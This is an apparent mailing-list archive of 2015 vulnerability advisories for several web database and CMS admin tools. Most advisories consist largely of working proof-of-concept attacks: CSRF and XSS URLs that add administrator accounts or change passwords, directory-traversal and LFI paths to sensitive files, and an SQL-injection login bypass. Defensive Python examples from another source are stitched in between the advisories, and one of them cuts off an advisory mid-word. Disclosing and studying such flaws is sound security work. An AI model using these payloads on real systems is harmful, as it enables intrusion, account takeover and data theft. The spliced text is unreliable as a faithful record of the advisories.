CSRF & XSS Wing FTP Server Admin <= v4.4.5

2015-04-28 Thread apparitionsec
Wing FTP Server Admin 4.4.5 - CSRF & Cross Site Scripting Vulnerabilities


Release Date:
=
2015-04-28


Source:

http://hyp3rlinx.altervista.org/advisories/AS-WFTP0328.txt


Common Vulnerability Scoring System:

Overall CVSS Score 8.9


Product:
===
Wing FTP Server is a Web based administration FTP client that supports the 
following protocols: FTP, FTPS, HTTPS, SSH



Advisory Information:
==
CSRF & client-side cross site scripting web vulnerability within Wing FTP 
Server Admin that allows adding arbitrary users to the system.


Vulnerability Disclosure Timeline:
==
March 28, 2015: Vendor Notification 
March 28, 2015: Vendor Response/Feedback
April 19, 2015: Vendor Notification
April 28, 2015: Vendor released new version 4.4.6
April 28, 2015: Public Disclosure - John Page



Affected Product(s):

Wing FTP Server Admin 4.4.5
Product: Wing FTP Server - Admin


Exploitation Technique:
===
Remote


Severity Level:
===
High


Technical Details & Description:



Request Method(s):
[+] POST & GET


Vulnerable Product:
[+] Wing FTP Server Admin <= 4.4.5


Vulnerable Parameter(s):
[+] domain & type


Affected Area(s):
[+] Server Admin


Proof of Concept (POC):
===
The CSRF and client-side cross site scripting web vulnerability can be 
exploited by remote attackers without a privileged application user account and 
with low user interaction (a click). The payload will add arbitrary users to the 
system.

PoC: Example

http://localhost:5466/admin_loglist.html?domain=[CSRF & XSS VULNERABILITIES]

POC: Add arbitrary user:

http://localhost:5466/admin_loglist.html?domain=%3Cscript%3EajaxRequest%28%27admin_adduser%27,%22domain%3dtest%26user%3d{%27username%27%3a%27hyp3rlinx%27,%27password%27%3a%27kuQrwgV%27,%27oldpassword%27%3a%27%27,%27max_download%27%3a%270%27,%27max_upload%27%3a%270%27,%27max_download_account%27%3a%270%27,%27max_upload_account%27%3a%270%27,%27max_connection%27%3a%270%27,%27connect_timeout%27%3a%275%27,%27idle_timeout%27%3a%275%27,%27connect_per_ip%27%3a%270%27,%27pass_length%27%3a%270%27,%27show_hidden_file%27%3a0,%27change_pass%27%3a0,%27send_message%27%3a0,%27ratio_credit%27%3a%270%27,%27ratio_download%27%3a%271%27,%27ratio_upload%27%3a%271%27,%27ratio_count_method%27%3a0,%27enable_ratio%27%3a0,%27current_quota%27%3a%270%27,%27max_quota%27%3a%270%27,%27enable_quota%27%3a0,%27note_name%27%3a%27%27,%27note_address%27%3a%27%27,%27note_zip%27%3a%27%27,%27note_phone%27%3a%27%27,%27note_fax%27%3a%27%27,%27note_email%27%3a%27%27,%27note_memo%27%3a%27%27,%27ipmasks%27%3a[],%27filemasks%27%3a[],%27directories%27%3a[],%27usergroups%27%3a[],%27subdir_perm%27%3a[],%27enable_schedule%27%3a0,%27schedules%27%3a[],%27limit_reset_type%27%3a%270%27,%27limit_enable_upload%27%3a0,%27cur_upload_size%27%3a%270%27,%27max_upload_size%27%3a%270%27,%27limit_enable_download%27%3a0,%27cur_download_size%27%3a%270%27,%27max_download_size%27%3a%270%27,%27enable_expire%27%3a0,%27expiretime%27%3a%272015-05-18%2021%3a17%3a46%27,%27protocol_type%27%3a63,%27enable_password%27%3a1,%27enable_account%27%3a1,%27ssh_pubkey_path%27%3a%27%27,%27enable_ssh_pubkey_auth%27%3a0,%27ssh_auth_method%27%3a0}%22,%20%22post%22%29%3C/script%3E


POC XSS:
http://localhost:5466/admin_viewstatus.html?domain=[XSS VECTOR]


POC XSS:
http://localhost:5466/admin_event_list.html?type=[XSS VECTOR]


Solution - Fix & Patch:
===
Vendor released updated version 4.4.6 Fix/Patch (Wing FTP Server)


Security Risk:
==
The security risk of the CSRF client-side cross site scripting web 
vulnerability in the `domain` admin_loglist.html value has a CVSS score of 8.9.


Credits & Authors:
==
John Page ( hyp3rlinx ) @apparitionsec


Disclaimer & Information:
=
The information provided in this advisory is provided as it is without any 
warranty. The security research reporter John Page disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. apparitionsec or its suppliers are not 
liable in any case of damage, including direct, indirect, incidental, 
consequential loss of business profits or special damages.

Domains:  hyp3rlinx.altervista.org


Sqlbuddy Directory Traversal Read Arbitrary Files Vulnerability

2015-05-11 Thread apparitionsec
Sqlbuddy Directory Traversal Read Arbitrary Files Vulnerability.

Vendor:
http://www.sqlbuddy.com

Release Date:
=
05-08-2015

Source:

http://hyp3rlinx.altervista.org/advisories/AS-SQLBUDDY0508.txt


Product:
===
sqlbuddy version 1.3.3. SQL Buddy is an open source web based MySQL 
administration application.


Advisory Information:
==
sqlbuddy suffers from directory traversal whereby a user can move about 
directories and read any PHP and non-PHP files by appending
the '#' hash character when requesting files via URLs.

e.g. .doc, .txt, .xml, .conf, .sql etc...

After adding the '#' character as a delimiter, any non-PHP file will be returned 
and rendered by subverting the .php concatenation used
by sqlbuddy when requesting PHP pages via the POST method.

Normal sqlbuddy request:
http://localhost/sqlbuddy/home.php?ajaxRequest=666&requestKey=


POC exploit payloads:
===

1-Read from Apache restricted directory under htdocs:
  http://localhost/sqlbuddy/#page=../../../restricted/user_pwd.sql#

2-Read any arbitrary files that do not have .PHP extensions:
  http://localhost/sqlbuddy/#page=../../../directory/sensitive-file.conf#

3-Read phpinfo (no need for '#' as phpinfo is a PHP file):
  http://localhost/sectest/sqlbuddy/sqlbuddy/#page=../../../../xampp/phpinfo


Disclosure Timeline:
==

Vendor Notification  N/A
May 8, 2015: Public Disclosure - hyp3rlinx


Exploitation Technique:
===
Create a test file with non .php extension in some htdocs directory then 
request the page in the browser.
http://localhost/sqlbuddy/sqlbuddy/#page=../../../test.txt#


Severity Level:
===
High


Description:
==


Request Method(s):
[+] POST

Vulnerable Product:
[+] sqlbuddy 1.3.3

Vulnerable Parameter(s):
[+] #page=somefile

Affected Area(s):
[+] Server directories & sensitive files


Solution - Fix & Patch:
===
N/A


Credits: John Page ( hyp3rlinx )


Disclaimer & Information:
=
The information provided in this advisory is provided as it is without any 
warranty. The security research reporter John Page disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. apparitionsec or its suppliers are not 
liable in any case of damage, including direct, indirect, incidental, 
consequential loss of business profits or special damages.

Domains:  hyp3rlinx.altervista.org


Sidu 5.2 Admin XSS Vulnerability

2015-05-14 Thread apparitionsec
Affected Vendor:
www.topnew.net/sidu/

Credits: John Page ( hyp3rlinx )
Domains:  hyp3rlinx.altervista.org

Source:
http://hyp3rlinx.altervista.org/advisories/AS-SIDU0513.txt


Product:
Sidu version 5.2 is a web based database front-end administration tool.


Advisory Information:
=
Sidu 5.2 is vulnerable to cross site scripting attacks.


Exploit code:
==

http://localhost/sidu52/sql.php?id=1&sql=%27%27%3Cscript%3Ealert%28%22XSS%20By%20hyp3rlinx%20\n05112015\n%22%2bdocument.cookie%29%3C/script%3E


Disclosure Timeline:
==

Vendor Notification  May 12, 2015
May 13, 2015: Public Disclosure


Severity Level:
===
High


Description:


Request Method(s):
[+] GET

Vulnerable Product:
[+] Sidu 5.2

Vulnerable Parameter(s):
[+] sql=[XSS]

Affected Area(s):
[+] Admin of currently logged in user.

==

(hyp3rlinx)


DbNinja 3.2.6 Flash XSS Vulnerabilities

2015-05-28 Thread apparitionsec
# Exploit Title: DbNinja Flash XSS Exploit
# Google Dork: intitle: Flash XSS
# Date: May 27, 2015
# Exploit Author: John Page (hyp3rlinx)
# Website: hyp3rlinx.altervista.org
# Vendor Homepage: www.dbninja.com
# Software Link: www.dbninja.com
# Version: 3.2.6
# Tested on: Windows 7
# Category: Flash XSS
# CVE : NA


Source:
http://hyp3rlinx.altervista.org/advisories/AS-DBNINJA0527.txt


Product:
DbNinja is a web based application for MySQL database administration.


Advisory Information:

DbNinja multiple Flash based XSS vulnerabilities


Vulnerability Details:
=
The DbNinja Flash uploader component contains 2 SWF files that use the Flash 
'ExternalInterface' API to call Javascript functions.
These SWFs can be exploited by supplying malicious code as parameters to those 
functions from the URL. The text value "Copy to Clipboard" can also be changed 
using the "buttonText" parameter.



Exploit code(s):
===

1- 
http://localhost/dbninja/dbninja/js/lib/uploader.swf?selectCallback=alert(document.cookie)

2- 
http://localhost/dbninja/dbninja/js/lib/clipboard.swf?buttonText=DbNinja%20Login&dataSourceFunc=alert(document.cookie)

3- 
http://localhost/dbninja/dbninja/js/lib/clipboard.swf?completeCallback=alert(document.cookie)
 



Disclosure Timeline:
=

Vendor Notification  May 23, 2015
May 27, 2015: Public Disclosure



Severity Level:
=
High



Description:
==

Request Method(s):
[+] GET

Vulnerable Product:
[+] DBNinja 3.2.6

Vulnerable Parameter(s):
[+] selectCallback, dataSourceFunc & completeCallback

Affected Area(s):
[+] uploader.swf, clipboard.swf

===

(hyp3rlinx)


JSPMyAdmin SQL Injection, CSRF & XSS Vulnerabilities

2015-05-29 Thread apparitionsec
Credits: John Page ( hyp3rlinx )
Domains:  hyp3rlinx.altervista.org

Source:
http://hyp3rlinx.altervista.org/advisories/AS-JSPMYADMIN0529.txt

Vendor:
code.google.com/p/jsp-myadmin


Product:
JSPMyAdmin 1.1 is a Java web based MySQL database management system.


Advisory Information:

JSPMyAdmin 1.1 SQL Injection, CSRF & XSS Vulnerabilities


SQL Injection
CSRF
XSS



Vulnerability Details:
=

SQL Injection:
deletedata.jsp is supposed to delete 1 field per query, yet we can control the 
SQL and build an OR condition.
The problem is that the application uses concatenated user input to build SQL 
statements even though parameterized queries are used.

In deletedata.jsp we find the following code:

con.prepareStatement("DELETE FROM " + table + " WHERE "+ field + "='" + val +"'");

So the expected SQL to be run is this, deleting 1 record.

e.g.
http://localhost:8081/JSPMyAdmin/deletedata.jsp?db=test&table=email&field=CATID&val=7

But the SQL Injection vulnerability lets us instead drop all fields using an 
SQL 'OR' statement.

e.g.
http://localhost:8081/JSPMyAdmin/deletedata.jsp?db=test&table=email&field=CATID or 'field'='NAME'

*


CSRF:
We can drop any database by sending the victim a malicious link, as there is no 
CSRF token used.
*


XSS:

There are zero user input checks, allowing remote attackers to execute arbitrary 
scripts in the context of an authenticated user's browser session.
***



Exploit code(s):
===

SQL Injection POC:
--

So the expected SQL to be run is this, deleting 1 record:
http://localhost:8081/JSPMyAdmin/deletedata.jsp?db=test&table=email&field=CATID&val=7
http://localhost:8081/JSPMyAdmin/deletedata.jsp?db=test&table=email&field=CATID or 'field'='NAME'


CSRF POC:
-
http://127.0.0.1:8081/JSPMyAdmin/drop.jsp?db=mydb



XSS(s) POC:
--
  
1- alert('XSS By hyp3rlinx');
   Using POST method in 'host' parameter of login page.
   http://127.0.0.1:8081/JSPMyAdmin/

2- 
http://127.0.0.1:8081/JSPMyAdmin/right.jsp?server=localhost&db="/>alert(666)

3- 
http://127.0.0.1:8081/JSPMyAdmin/right.jsp?server="/>alert(666)&db=

4- 
http://127.0.0.1:8081/JSPMyAdmin/tabledata.jsp?db="/>alert(666);

5- 
http://127.0.0.1:8081/JSPMyAdmin/tabledata.jsp?server=localhost&db=mysql&table="/>alert(666);

6- 
http://127.0.0.1:8081/JSPMyAdmin/tabledata.jsp?server="/>alert(666);&db=

7- 
http://127.0.0.1:8081/JSPMyAdmin/query.jsp?server="/>alert(666)&db=

8- 
http://127.0.0.1:8081/JSPMyAdmin/export.jsp?db=test&table=alert(666)
 



Disclosure Timeline:
=


Vendor Notification:  NA
May 29, 2015: Public Disclosure



Severity Level:
=
High



Description:
==

Request Method(s):
[+] GET / POST

Vulnerable Product:
[+] JSPMyAdmin 1.1

Vulnerable Parameter(s):
[+] host, server, db, table

Affected Area(s):
[+] Entire admin

===

(hyp3rlinx)


Enhanced SQL Portal 5.0.7961 XSS Vulnerability

2015-06-02 Thread apparitionsec
[+] Credits: John Page ( hyp3rlinx )

[+] Domains: hyp3rlinx.altervista.org

[+] Source:  http://hyp3rlinx.altervista.org/advisories/AS-ENHSQLPORTAL0602.txt



Vendor:
www.eliacom.com
www.eliacom.com/mysql-gui-download.php



Product:
Enhanced SQL Portal 5.0.7961 is a web based MySQL administration application.



Advisory Information:

Enhanced SQL Portal 5.0.7961 XSS Vulnerability




Vulnerability Details:
=
iframe.php contains an XSS vulnerability



Exploit code(s):
===


http://localhost/Enhanced_SQL_Portal_5.0.7961_05_06_2015/iframe.php?id="/>alert(666)
  


Disclosure Timeline:
=


Vendor Notification: May 28, 2015
June 2, 2015 : Public Disclosure


Severity Level:
=
Med



Description:
==

Request Method(s):
[+] GET

Vulnerable Product:
[+] Enhanced SQL Portal 5.0.7961 

Vulnerable Parameter(s):
[+] id

Affected Area(s):
[+] iframe

===

(hyp3rlinx)


vfront-0.99.2 CSRF & Persistent XSS

2015-06-02 Thread apparitionsec
[+] Credits: John Page ( hyp3rlinx )

[+] Domains: hyp3rlinx.altervista.org

[+] Source:  http://hyp3rlinx.altervista.org/advisories/AS-VFRONT0602.txt



Vendor:
==
www.vfront.org



Product:
===
vfront-0.99.2 is a PHP web based MySQL & PostgreSQL database management 
application.



Advisory Information:

CSRF, Persistent XSS & reflected XSS



Vulnerability Detail(s):
===


CSRF:
=
No CSRF token in place, therefore we can add arbitrary users to the system.


Persistent XSS:

variabili.php has multiple XSS vectors using the POST method; one input field, 
'altezza_iframe_tabella_gid', will store the XSS payload
in the MySQL database, where it will be run each time variabili.php is accessed 
from the victim's browser.


Persisted XSS stored in MySQL DB:
=
DB-> vfront_vfront
TABLE-> variabili
COLUMN--> valore (will contain our XSS)


Exploit code(s):
===


CSRF code add arbitrary users to system:
===
http://localhost/vfront-0.99.2/vfront-0.99.2/admin/log.php?op="/>var xhr%3dnew XMLHttpRequest();xhr.onreadystatechange%3dfunction(){if(xhr.status%3d%3d200){if(xhr.readyState%3d%3d4){alert(xhr.responseText);}}};xhr.open('POST','utenze.db.php?insert_new',true);xhr.setRequestHeader('Content-type','application/x-www-form-urlencoded');xhr.send('nome%3dhyp3rlinxe%26cognome%3dapparitionsec%26email%...@x.com%26passwd%3dhacked%26passwd1%3dhacked');&tabella=&uid=&data_dal=All&data_al=All



Persistent XSS:

http://localhost/vfront-0.99.2/vfront-0.99.2/admin/variabili.php?feed=0&gidfocus=0
Inject XSS into the 'altezza_iframe_tabella_gid' input field to store it in the 
database.
"/>alert(666)



Reflected XSS(s):
=
http://localhost/vfront-0.99.2/vfront-0.99.2/admin/query_editor.php?id=&id_table=&id_campo="/>alert(666)



XSS vulnerable input fields:

http://localhost/vfront-0.99.2/vfront-0.99.2/admin/variabili.php
altezza_iframe_tabella_gid   <- ( Persistent XSS )
passo_avanzamento_veloce_gid
n_record_tabella_gid
search_limit_results_gid
max_tempo_edit_gid
home_redirect_gid
formati_attach_gid
default_group_ext_gid
cron_days_min_gid

  

Disclosure Timeline:
===


Vendor Notification: May 31, 2015
June 2, 2015 : Public Disclosure



Severity Level:
===
High



Description:
==

Request Method(s):
[+]  GET & POST

Vulnerable Product:
[+]  vfront-0.99.2

Vulnerable Parameter(s):
[+] altezza_iframe_tabella_gid
passo_avanzamento_veloce_gid
n_record_tabella_gid
search_limit_results_gid
max_tempo_edit_gid
home_redirect_gid
formati_attach_gid
default_group_ext_gid
cron_days_min_gid
id_campo
op
   


Affected Area(s):   [+]  Admin & MySQL DB

===


(hyp3rlinx)


Symphony CMS 2.6.2

2015-06-08 Thread apparitionsec
[+] Credits: John Page ( hyp3rlinx )

[+] Domains: hyp3rlinx.altervista.org

[+] Source:  http://hyp3rlinx.altervista.org/advisories/AS-SYMPHONY0606.txt



Vendor:

www.getsymphony.com/download/


Product:

Symphony CMS 2.6.2


Advisory Information:

Symphony CMS XSS Vulnerability



Vulnerability Details:
=
The 'sort' parameter used by author search in Admin is XSS exploitable. 
Symphony seems to escape injected strings,
e.g. 'HELL' becomes \'HELL\', but we can easily defeat that using the Javascript 
functions charCodeAt() & fromCharCode().

e.g. 
String.fromCharCode(72,69,76,76)

Now we can output our 'HELL' strings, construct URLs etc... 


Exploit XSS code(s):


http://localhost/symphony-2.6.2/symphony/system/authors/?sort=alert(String.fromCharCode(72,69,76,76))&order=asc
  

Disclosure Timeline:
=


Vendor Notification: June 5, 2015
June 6, : Public Disclosure



Severity Level:
=
Med



Description:
==

Request Method(s):
[+]  GET

Vulnerable Product:
[+]  Symphony CMS 2.6.2

Vulnerable Parameter(s):
[+]  sort

Affected Area(s):
[+]  symphony/system/authors/

===

(hyp3rlinx)


Symphony CMS XSS Vulnerability

2015-06-08 Thread apparitionsec
[+] Credits: John Page ( hyp3rlinx )

[+] Domains: hyp3rlinx.altervista.org

[+] Source:  http://hyp3rlinx.altervista.org/advisories/



Vendor:

http://www.silverstripe.org/software/download



Product:

SilverStripe CMS & Framework v3.1.13


Advisory Information:

Unvalidated redirect & XSS vulnerabilities




Vulnerability Details:
=
Unvalidated redirect


XSS (reflected):



Exploit code(s):
===



Unvalidated redirect POC:
--
http://localhost/SilverStripe-cms-v3.1.13/dev/build?returnURL=[EVIL REMOTE FILE LOCATION]



XSS(s) POC:
--
  



Disclosure Timeline:
=


Vendor Notification: June 7, 2015
: Public Disclosure



Severity Level:
=
High



Description:
==

Request Method(s): [+] GET & POST


Vulnerable Product:[+] SilverStripe CMS & Framework v3.1.13


Vulnerable Parameter(s):   [+] 


Affected Area(s):  [+] 

===

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and that due credit is given. 
Permission is explicitly given for insertion in vulnerability databases and 
similar, provided that due credit is given to the author.

The author is not responsible for any misuse of the information contained 
herein and prohibits any malicious use of all security related information or 
exploits by the author or elsewhere.

(hyp3rlinx)


Symphony CMS XSS Vulnerability [Corrected Post]

2015-06-09 Thread apparitionsec
[Correction] of Vendor Info for Symphony CMS XSS Vulnerability POST on (Jun 08)
=

[+] Credits: John Page ( hyp3rlinx )

[+] Domains: hyp3rlinx.altervista.org

[+] Source:  http://hyp3rlinx.altervista.org/advisories/AS-SYMPHONY0606.txt



Vendor:

www.getsymphony.com/download/


Product:

Symphony CMS 2.6.2


Advisory Information:

Symphony CMS XSS Vulnerability



Vulnerability Details:
=
The 'sort' parameter used by author search in Admin is XSS exploitable. 
Symphony seems to escape injected strings,
e.g. 'HELL' becomes \'HELL\', but we can easily defeat that using the Javascript 
functions charCodeAt() & fromCharCode().

e.g. 
String.fromCharCode(72,69,76,76)

Now we can output our 'HELL' strings, construct URLs etc... 


Exploit XSS code(s):


http://localhost/symphony-2.6.2/symphony/system/authors/?sort=alert(String.fromCharCode(72,69,76,76))&order=asc
  

Disclosure Timeline:
=


Vendor Notification: June 5, 2015
June 6, : Public Disclosure



Severity Level:
=
Med



Description:
==

Request Method(s):
[+]  GET

Vulnerable Product:
[+]  Symphony CMS 2.6.2

Vulnerable Parameter(s):
[+]  sort

Affected Area(s):
[+]  symphony/system/authors/

===

(hyp3rlinx)


SilverStripe CMS Unvalidated Redirect & XSS vulnerabilities

2015-06-09 Thread apparitionsec
[+] Credits: hyp3rlinx

[+] Domains: hyp3rlinx.altervista.org

[+] Source:  http://hyp3rlinx.altervista.org/advisories/AS-SILVERSTRIPE0607.txt


Vendor:

http://www.silverstripe.org/software/download


Product:

SilverStripe CMS & Framework v3.1.13


Advisory Information:
===
Unvalidated redirect & XSS vulnerabilities


Vulnerability Details:
=
Unvalidated redirect:

The 'returnURL' parameter for the following URL:
http://localhost/SilverStripe-cms-v3.1.13/dev/build
is open to abuse by supplying a malicious location or file.


XSS (reflected):
install.php is XSS vulnerable using the POST method for the following input fields.

admin_username
admin_password


Exploit code(s):
===

Unvalidated redirect POC:
http://localhost/SilverStripe-cms-v3.1.13/dev/build?returnURL=[EVIL REMOTE FILE LOCATION]


XSS POC:
http://localhost/SilverStripe-cms-v3.1.13/install.php
admin_username
admin_password
">alert(666)



Disclosure Timeline:
===
Vendor Notification: June 7, 2015
June 8, 2015 : Public Disclosure



Severity Level:
===
Med


Description:
===

Request Method(s): [+] GET & POST


Vulnerable Product:[+] SilverStripe CMS & Framework v3.1.13


Vulnerable Parameter(s):   [+] returnURL, admin_username & admin_password


Affected Area(s):  [+] install & dev

===

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and that due credit is given. 
Permission is explicitly given for insertion in vulnerability databases and 
similar, provided that due credit is given to the author. The author is not 
responsible for any misuse of the information contained herein and prohibits 
any malicious use of all security related information or exploits by the author 
or elsewhere.

(hyp3rlinx)
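Added example, not part of the advisory or of SilverStripe's code: a validator for a `returnURL` style parameter that refuses any target outside the application's own origin. `APP_ORIGIN`, `safe_return_url` and `redirect_target` are names chosen for this demo, and `http://localhost` stands in for the site's origin.

```python
from typing import Optional
from urllib.parse import urljoin, urlsplit

APP_ORIGIN = "http://localhost"  # constructed: the application's own origin


def safe_return_url(candidate: str, origin: str = APP_ORIGIN) -> Optional[str]:
    """Return the absolute URL to redirect to, or None if it would leave `origin`.

    Accepted shapes:
      * a relative path that starts with exactly one '/', or
      * an absolute http(s) URL whose host and port equal the app's own,
        with no userinfo.
    Everything else is rejected: scheme-relative '//evil', 'javascript:',
    'http:evil' (no netloc), backslashes, CR/LF, NUL and 'host@evil' forms.
    """
    if not candidate or any(ch in candidate for ch in "\\\r\n\x00"):
        return None
    if candidate.startswith("/") and not candidate.startswith("//"):
        return urljoin(origin, candidate)
    parts, app = urlsplit(candidate), urlsplit(origin)
    if parts.scheme not in ("http", "https"):
        return None
    if parts.username is not None or parts.hostname is None:
        return None
    try:
        port = parts.port          # raises ValueError on 'host:abc'
    except ValueError:
        return None
    if parts.hostname != app.hostname or port != app.port:
        return None
    return candidate


def redirect_target(return_url: Optional[str], fallback: str = "/") -> str:
    """What an endpoint such as dev/build should redirect to: the validated
    returnURL, otherwise a fixed fallback, never the raw parameter."""
    return safe_return_url(return_url or "") or urljoin(APP_ORIGIN, fallback)
```

The port comparison is deliberately strict: `http://localhost:80/` is refused because the configured origin names no port.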


Nakid-CMS CSRF, Persistent XSS & LFI

2015-06-12 Thread apparitionsec
[+] Credits: John Page ( hyp3rlinx )

[+] Domains: hyp3rlinx.altervista.org

[+] Source:  http://hyp3rlinx.altervista.org/advisories/AS-NAKIDCMS0611.txt



Vendor:

http://kilrizzy.github.io/Nakid-CMS/



Product:

kilrizzy-Nakid-CMS-f274624
Nakid CMS is an open source content management system built using PHP and 
CodeIgniter.


Setup mode:
==
Under the root dir for Nakid CMS we set production mode instead of development 
in index.php.
e.g. define('ENVIRONMENT', 'production');



Advisory Information:

CSRF, Persistent XSS &  Auth bypass LFI



Vulnerability Details:
=
Multiple CSRF(s) exist:

We have the ability to do the following as no CSRF tokens are present.

1-Change Admin password
2-Add arbitrary users to system
3-Alter system settings



XSS (persistent):
XSS parameter vulnerabilities exist for the following:
payloads will be stored in the MySQL database and activated when a victim 
visits the vulnerable webpage.


XSS URL:

http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/system/users
On the "Edit Record" pop up dialog box.


Vulnerable parameters:
-
username
password
email
fname
lname


XSS URL:

http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/system/settings
On the "Edit Record" pop up dialog box.


Vulnerable parameters:
-
from_name
include_path
primary_email
from_email


XSS URL:

http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/system/content_edit/1

Vulnerable parameter:

title


Authentication bypass LFI:
Local file inclusion to bypass access controls and read arbitrary files exists 
by setting the '$url' PHP variable on the following URL

index.php/connector$url



Exploit POC code(s):


CSRF(s):


Condition:
Persuade the victim to visit our webpage or click our link; if they have a 
session then we do our CSRF!


1- Add arbitrary user to system 






function doit(){
var e=document.getElementById('ruinurlife')
e.submit()
}



http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/grid/users";
 method="post">







 




2-Change Admin password 






function doit(){
var e=document.getElementById('ruinurlife')
e.submit()
}



http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/system/profile";
 method="post">












3-Alter system settings
---





function doit(){
var e=document.getElementById('ruinurlife')
e.submit()
}



http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/grid/settings";
 method="post">








XSS persistent POC code:
===

Inject alert(666) into any of the following vulnerable fields 
described above using the POST method.
You need to highlight a row, then click the edit dialog box to edit settings.

e.g.

http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/system/settings

from_name <--- alert(666) 
include_path
primary_email
from_email


Authorization bypass LFI:


1- Logout, create a hell.txt file or whatever and put in 'htdocs' or web root, 
then visit the URL (change to suit your environment).

2- 
http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/connector$url=../../../../../../../hell.txt

OR try

http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/connector$url=../../../../../../xampp/phpinfo.php




Disclosure Timeline:
=
Vendor Notification: NA
June 11, 2015 : Public Disclosure




Severity Level:
=
High



Description:
==

Request Method(s): [+] GET & POST


Vulnerable Product:[+] kilrizzy-Nakid-CMS-f274624


Vulnerable Parameter(s):   [+] 
  username
  password
  email
  fname
  lname
  from_name
  include_path
  primary_email
  from_email
  title
  connector$url


Affected Area(s):  [+] /system/users
   /system/profile
   /system/content_edit/

===

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and that due credit is given. 
Permission i
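Added example, not part of the Nakid CMS or sqlbuddy advisories above nor of either project's code: a resolver for a `page=` / `$url` style parameter that refuses the traversal shapes both posts describe (`../../../restricted/user_pwd.sql#`, `../../../../../../../hell.txt`). The directory tree, `PAGE_SUFFIX` and the function names are constructed for the demo.

```python
import os
import tempfile
from typing import Dict, Optional

PAGE_SUFFIX = ".php"   # constructed: the suffix the include code appends


def resolve_under_root(root: str, requested: str,
                       suffix: str = PAGE_SUFFIX) -> Optional[str]:
    """Map a 'page=' style parameter to a real file path inside `root`.

    Returns the resolved path, or None when the request must be refused:
      * empty, absolute, or containing '#' / NUL (the delimiters abused above)
      * the expected suffix is appended BEFORE resolution, so '../x.txt'
        can only ever name '../x.txt.php', never a raw .txt / .sql / .conf
      * realpath() collapses '..' and symlinks, then commonpath() must equal
        the real root ('startswith' alone would accept a sibling 'root2/')
      * the final target must exist as a regular file with the suffix
    """
    if not requested or requested.startswith(("/", "\\")):
        return None
    if "#" in requested or "\x00" in requested:
        return None
    name = requested if requested.endswith(suffix) else requested + suffix
    real_root = os.path.realpath(root)
    target = os.path.realpath(os.path.join(real_root, name))
    if os.path.commonpath([real_root, target]) != real_root:
        return None
    if not target.endswith(suffix) or not os.path.isfile(target):
        return None
    return target


def build_demo_tree() -> str:
    """Constructed layout mirroring the sqlbuddy PoC:
    <tmp>/htdocs/sqlbuddy/home.php   (web root = .../sqlbuddy)
    <tmp>/htdocs/sqlbuddy/notes.txt
    <tmp>/restricted/user_pwd.sql    (outside the web root)"""
    base = tempfile.mkdtemp(prefix="traversal-demo-")
    root = os.path.join(base, "htdocs", "sqlbuddy")
    os.makedirs(root)
    os.makedirs(os.path.join(base, "restricted"))
    for rel in ("htdocs/sqlbuddy/home.php", "htdocs/sqlbuddy/notes.txt",
                "restricted/user_pwd.sql"):
        with open(os.path.join(base, *rel.split("/")), "w") as fh:
            fh.write("demo\n")
    return root


def demo() -> Dict[str, bool]:
    """Exercise the resolver with the request shapes from the two posts."""
    root = build_demo_tree()
    home = os.path.realpath(os.path.join(root, "home.php"))
    return {
        "plain_page_served": resolve_under_root(root, "home") == home,
        "suffixed_page_served": resolve_under_root(root, "home.php") == home,
        # sqlbuddy PoC 1: '#page=../../../restricted/user_pwd.sql#'
        "hash_traversal_blocked":
            resolve_under_root(root, "../../restricted/user_pwd.sql#") is None,
        # Nakid PoC: 'connector$url=../../../../../../../hell.txt' (no '#')
        "plain_traversal_blocked":
            resolve_under_root(root, "../../restricted/user_pwd.sql") is None,
        # a non-.php file inside the root is still not served
        "txt_inside_root_blocked": resolve_under_root(root, "notes.txt") is None,
        "absolute_path_blocked": resolve_under_root(root, "/etc/passwd") is None,
    }


if __name__ == "__main__":
    for check, ok in demo().items():
        print(f"{check}: {'ok' if ok else 'FAIL'}")
```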

ZCMS SQL Injection & Persistent XSS

2015-06-12 Thread apparitionsec
[+] Credits: John Page ( hyp3rlinx )

[+] Domains: hyp3rlinx.altervista.org

[+] Source:  http://hyp3rlinx.altervista.org/advisories/AS-ZCMS0612.txt



Vendor:
=
http://zencherry.com/
http://sourceforge.net/projects/zencherrycms



Product:
==
ZCMS 1.1 JavaServer Pages Content Management System



Advisory Information:
==
SQL Injection & Persistent XSS



Vulnerability Details:
==
SQL Injection:
Login to the admin area requires a password but is easily bypassed using the 
classic SQL injection method because the application uses concatenated user 
input to construct SQL queries.


ZCMS exploitable admin login code:
==
squerry="SELECT COUNT(username) AS usercount FROM "+TABLE_PREFIX+"users WHERE
status = 0 AND username = '"+username+"' AND password =
'"+request.getParameter("pass") +"' AND type = 1 ;";


So we just supply an Admin password like --->  HELL' OR '2'='2
which will resolve as true!
 

SQL Inject XSS Payload:
===
We can also inject a persistent XSS payload directly into the MySQL database, 
subverting all character filtering by leveraging the existing SQL injection 
vulnerabilities.


Persistent XSS:
===

Another persistent XSS vector is here in the author field for comments:
http://localhost:8081/ZCMS_1.1/ZCMS_1.1/index.jsp?dir=editpost&p=[page number]


Exploit code(s):
===

1) Bypass admin login
-
localhost:8081/ZCMS_1.1/ZCMS_1.1/?dir=login
Enter 'admin' for username field
Enter HELL' OR '2'='2 for the pass field


2) Inject XSS using SQL Injection
-
http://localhost:8081/ZCMS_1.1/ZCMS_1.1/?dir=editpost&p=1&title=";alert(1)&content=alert(1)&author=alert(1)SATAN&visibility=1&type=1&comm=0


3) Persistent XSS field
---
